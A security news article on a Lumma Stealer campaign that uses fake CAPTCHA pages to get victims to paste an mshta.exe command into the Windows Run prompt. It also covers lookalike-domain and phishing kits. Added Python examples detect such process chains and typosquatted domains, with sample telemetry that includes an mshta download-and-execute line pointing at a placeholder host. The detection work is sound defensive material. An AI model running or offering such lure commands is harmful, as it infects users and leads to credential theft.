Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks


Jan 23, 2025 | Ravie Lakshmanan | Phishing / Malware

Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the notorious Lumma information stealer.

“The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News.

“The campaign also spans multiple industries, including healthcare, banking, and marketing, with the telecom industry having the highest number of organizations targeted.”

The attack chain begins when a victim visits a compromised website, which directs them to a bogus CAPTCHA page that specifically instructs the site visitor to copy and paste a command into the Windows Run prompt. That command uses the native mshta.exe binary to download and execute an HTA file from a remote server.

It is worth noting that a previous iteration of this technique, widely known as ClickFix, involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.

The HTA file, in turn, executes a PowerShell command to launch a next-stage payload: a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before taking steps to bypass the Windows Antimalware Scan Interface (AMSI) in an effort to evade detection.

“By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all the necessary steps outside of the browser context,” Fróes explained.

“The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. By using different delivery methods and payloads it makes detection and blocking of such threats more complex, especially when abusing user interactions within the system.”
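Because the chain described above runs entirely outside the browser, the place to catch it is endpoint process-creation telemetry rather than web filtering. The following is an added example, not code from the article or from Netskope: it scores constructed process events against the three indicators the article gives (mshta.exe fetching a remote HTA, that process being a child of the Run prompt's parent explorer.exe, and PowerShell launched by mshta.exe with an encoded command that references AMSI). The event field names, the indicator tags and the sample command lines are assumptions made for this example; the `example.invalid` host is a reserved name, not an indicator.

```python
"""Flag ClickFix-style process chains in endpoint process-creation telemetry.

Added example (not from the article or Netskope): the events below are
constructed to resemble the chain the article describes (Run prompt ->
mshta.exe fetching a remote HTA -> PowerShell with an encoded command).
Field names (parent, image, cmdline) are assumptions, not any vendor's schema.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # full path of the parent process image
    image: str    # full path of the created process image
    cmdline: str  # command line as logged


URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(ev: ProcEvent) -> list:
    """Return the list of indicators matched by one event, in a fixed order."""
    findings = []
    image, parent = basename(ev.image), basename(ev.parent)
    if image == "mshta.exe" and URL_RE.search(ev.cmdline):
        findings.append("remote_hta_via_mshta")
        # Commands typed into Win+R (the Run prompt) are children of explorer.exe
        if parent == "explorer.exe":
            findings.append("run_prompt_parent")
    if image in SHELLS:
        if parent == "mshta.exe":
            findings.append("powershell_child_of_mshta")
        decoded = decode_encoded_command(ev.cmdline)
        if decoded is not None:
            findings.append("encoded_powershell")
            # The article notes the loader tampers with AMSI before decoding Lumma;
            # any reference to AMSI inside a decoded script deserves a look.
            if "amsi" in decoded.lower():
                findings.append("amsi_reference")
    return findings


def scan(events):
    """Return (index, findings) for every event that matched at least one indicator."""
    return [(i, f) for i, ev in enumerate(events) if (f := assess(ev))]


def encode_ps(script: str) -> str:
    """Helper used only to build the constructed sample: PowerShell expects UTF-16LE Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real IoCs); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/verify.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc " + encode_ps("Write-Output 'AMSI state check'")),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].cmdline[:40], findings)
```

The explorer.exe parent check is what separates a user pasting into the Run prompt from a scheduled task or an installer legitimately using mshta.exe; the encoded-command decoder matters because the indicator the article gives (AMSI tampering) is only visible after the Base64 layer is removed.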

Fake CAPTCHA Campaign

As recently as this month, Lumma has also been distributed via roughly 1,000 counterfeit domains impersonating Reddit and WeTransfer that redirect users to download password-protected archives.

These archive files contain an AutoIT dropper dubbed SelfAU3 Dropper that subsequently executes the stealer, according to Sekoia researcher crep1x. In early 2023, threat actors leveraged a similar technique to spin up over 1,300 domains masquerading as AnyDesk in order to push the Vidar Stealer malware.
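Both the Reddit/WeTransfer wave and the earlier AnyDesk wave rely on lookalike domains, which is something a defender can triage mechanically from newly registered domain feeds or proxy logs. The block below is an added example, not code from the article, Sekoia or any vendor: it classifies domains against a small brand list as legitimate, brand under the wrong TLD, brand embedded with an affix, or typosquat within a small edit distance. The `BRANDS` table, the verdict names, the distance threshold and every entry in `SAMPLE_DOMAINS` are constructed for this example and are not real indicators.

```python
"""Triage candidate domains for brand impersonation.

Added example (not from the article, Sekoia, or any vendor): a small
lookalike-domain classifier of the kind a defender runs over newly registered
domains or proxy logs. BRANDS and SAMPLE_DOMAINS are constructed for this
example; the domains are not real indicators.
"""

BRANDS = {"reddit": "reddit.com", "wetransfer": "wetransfer.com", "anydesk": "anydesk.com"}


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; inputs are short, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_domain(domain: str):
    """Return (registrable domain, second-level label); assumes single-label TLDs."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) < 2:
        return domain.lower(), domain.lower()
    return ".".join(parts[-2:]), parts[-2]


def classify(domain: str):
    """Return (verdict, brand) for one domain."""
    reg, label = split_domain(domain)
    for brand, legit in BRANDS.items():
        if reg == legit:
            return "legitimate", brand
    for brand in BRANDS:
        if label == brand:
            return "wrong_tld", brand          # brand name under another TLD
        if brand in label:
            return "brand_embedded", brand     # reddit-app, wetransferfiles, ...
        if levenshtein(label, brand) <= max(1, len(brand) // 5):
            return "typosquat", brand          # one or two character edits away
    return "unrelated", None


def triage(domains):
    """Group domains by verdict, preserving input order within each group."""
    groups = {}
    for d in domains:
        verdict, _ = classify(d)
        groups.setdefault(verdict, []).append(d)
    return groups


# Constructed sample input; none of these are real indicators.
SAMPLE_DOMAINS = [
    "reddit.com", "www.wetransfer.com", "reddlt.com", "reddit-app.net",
    "wetransfers.org", "anydesk.co", "example.org",
]

if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        print(f"{d:22} {classify(d)}")
```

A "wrong_tld" verdict is a review queue, not a block decision, since brands routinely own several TLDs; the edit-distance threshold scales with brand length so that a ten-character name tolerates two edits while a six-character one tolerates one.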

The development comes as Barracuda Networks detailed an updated version of the Phishing-as-a-Service (PhaaS) toolkit known as Tycoon 2FA that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”

These include the use of legitimate (possibly compromised) email accounts to send phishing emails, and a series of steps taken to prevent analysis: detecting automated security scripts, listening for keystrokes that suggest web inspection, and disabling the right-click context menu.

Social engineering-oriented credential harvesting attacks have also been observed leveraging avatar provider Gravatar to mimic various legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.

“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials,” SlashNext Field CTO Stephen Kowski said.

“Instead of generic phishing attempts, attackers tailor their fake profiles to closely resemble the legitimate services they’re mimicking, through services that aren’t commonly known or protected.”
